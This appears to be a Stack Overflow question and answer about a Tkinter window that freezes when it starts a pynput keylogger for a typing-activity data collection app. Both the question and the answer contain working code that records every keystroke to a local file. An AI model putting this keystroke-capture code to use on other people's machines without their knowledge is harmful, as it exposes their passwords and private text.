# Calling a keylogger from a function in python goes to Not responding state

Tags: python, issue-tracking, keylogger

I have a python file `GUIApp.py` which creates a `Tkinter` GUI based window, Now on click on submit I wanted `keylogger` to start and run in background, record the keys entered. When I try calling the `keylogger` function, the `Tkinter` window goes
to unresponding state and does not do the rest of the operations. Below is the code. Kindly help.

```py
from tkinter import *
import pynput
import logging
from pynput.keyboard import Key as key,Listener

def typingActivity():
    keys = []

    log_dir = r"C:/Users/navesh/desktop/"
    logging.basicConfig(filename=(log_dir + "kLog.txt"), level=logging.INFO, format='%(asctime)s: %(message)s')

    def on_press(key):
        keys.append(key)
        # write_file(keys)
        logging.info("Pressed " + str(key))

    def on_release(key):
        # print('{0} released'.format(key))
        keys.append(key)
        logging.info("Released " + str(key))

    with Listener(on_press=on_press,
                  on_release=on_release) as listener:
        listener.join()

    typingAct = Tk()
    typingAct.title("Typing Activity")
    typingAct.geometry("1500x1500")
    userId = userTextbox.get()

    q1Label = Label(typingAct, text="1.    Why will you recommend this phone")
    q1Label.pack()

    q1Textbox = Entry(typingAct, width=90)
    q1Textbox.pack()

    log_dir = r"C:/Users/desktop/"
    logging.basicConfig(filename=(log_dir + userId+".txt"), level=logging.INFO, format='%(asctime)s: %(message)s')

root = Tk()
root.title("Data Collection")
root.geometry("1000x1000")

welcomeText = Text(root, height=20, width=50)
#welcomeText.configure('bold_italics', font=('Arial', 12, 'bold', 'italic'))
    #root, text="Open browser in desktop")
welcomeText.pack()
welcomeText.insert(END,"Welcome")

userLabel = Label(root, text="Enter UserID")
userLabel.pack()

userTextbox = Entry(root, width=30)
userTextbox.pack()`enter code here`

submitButton = Button(root, text ="Next", command=typingActivity)
submitButton.pack()

root.mainloop()
```

Answer (score 0):

Create two scripts, one which is the GUI and the other keylogger script:

```
#GUI.py

import tkinter as tk  
import os 
import time
import pytesseract_capturer
  
top = tk.Tk()
  
  
top.geometry("200x50") 


 
def opening():
    os.system("keylogger.py") #this runs the script keylogger.py when you click capture(or mention the location where your keylogger is)
b = tk.Button(top,text = "quit",width=10, fg="red", command=quit)  
b.pack(side=tk.RIGHT)
a = tk.Button(top,text = "capture",width=10, fg="blue", command=opening)   

a.pack(side=tk.LEFT)


top.mainloop()
```

keylogger.py

```
# keylogger using pynput module 
   
import pynput 
from pynput.keyboard import Key, Listener 
   
keys = [] 
   
def on_press(key): 
      
    keys.append(key) 
    write_file(keys) 
      
    try: 
        print('alphanumeric key {0} pressed'.format(key.char)) 
          
    except AttributeError: 
        print('special key {0} pressed'.format(key)) 
           
def write_file(keys): 
      
    with open('D:/log.txt', 'w') as f: # This will save in D drive as log.txt
        for key in keys: 
              
            # removing '' 
            k = str(key).replace("'", "") 
            f.write(k) 
                      
            # explicitly adding a space after  
            # every keystroke for readability 
            f.write(' ')  
               
def on_release(key): 
                      
    print('{0} released'.format(key)) 
    if key == Key.esc: 
        # Stop listener 
        return False
   
   
with Listener(on_press = on_press, 
              on_release = on_release) as listener: 
                      
    listener.join()
```

Comment: I tried this code given by you. This too is creating a not responding window only. On click of Next in the code specified by me, I need to do 2 things. 1. Invoke Keylogger 2. Open another window. But with your code too, the second window does not get invoked and also the first window with "Next" button goes to Not responding state

Comment: Try waiting some times, for like a minute or so, or open task manager and see if it is using cpu or ram or if the values are changing, if it is then wait for some time